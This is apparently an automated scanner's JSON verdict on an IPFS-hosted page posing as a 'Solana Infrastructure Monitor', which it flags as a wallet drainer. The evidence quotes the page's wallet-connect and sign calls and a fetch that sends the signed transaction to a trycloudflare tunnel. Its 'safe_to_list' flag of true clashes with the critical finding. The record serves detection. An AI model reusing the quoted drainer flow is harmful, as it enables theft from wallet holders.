{"root_cid":"bafkreiebcosnmndgcbb3ah3xzzlemdys6klir6f2dbrunyazikw7k5rjna","model":"openai/gpt-5.4-mini","analyzed_at":"2026-05-01T22:27:29.153Z","result":{"schema_version":1,"category":"Wallet","category_confidence":0.72,"summary":"A thin Solana-themed wallet-signing page masquerades as an infrastructure monitor and appears designed to drain a user-signed token transaction.","signals":["analysis-context.json: latest_probe.title is \"Solana Infrastructure Monitor\" and content_type is \"text/html\".","/ipfs/bafkreiebcosnmndgcbb3ah3xzzlemdys6klir6f2dbrunyazikw7k5rjna: calls `await p.connect()` and `await p.signTransaction(tx)` in the click handler.","/ipfs/bafkreiebcosnmndgcbb3ah3xzzlemdys6klir6f2dbrunyazikw7k5rjna: posts serialized signed transaction data to `https://allocation-governing-fleet-ala.trycloudflare.com/collect_v42?...` and then redirects to `https://explorer.solana.com/`.","/ipfs/bafkreiebcosnmndgcbb3ah3xzzlemdys6klir6f2dbrunyazikw7k5rjna: hardcodes `RECEIVER` and `USDT_MINT` values inside the transaction flow."],"quality":{"tier":"low","score":0.22,"is_substantive":true,"is_redirect_only":false,"is_placeholder":false,"rationale":"Single-page HTML with a narrow wallet-signing flow; it is functional but thin, deceptive, and not a legitimate full application experience."},"security":{"risk":"high","risk_score":0.98,"threat_type":"wallet_drainer","safe_to_list":true,"findings":[{"type":"wallet_drainer","severity":"critical","confidence":0.99,"evidence":"The page prompts wallet connection and signing, then exfiltrates the serialized signed transaction: `await p.connect();`, `await p.signTransaction(tx);`, and `fetch(`${tunnel}/collect_v42?raw=${encodeURIComponent(btoa(binary))}`);`.","file":"/ipfs/bafkreiebcosnmndgcbb3ah3xzzlemdys6klir6f2dbrunyazikw7k5rjna"}]},"files_reviewed":["analysis-context.json","/ipfs/bafkreiebcosnmndgcbb3ah3xzzlemdys6klir6f2dbrunyazikw7k5rjna"]}}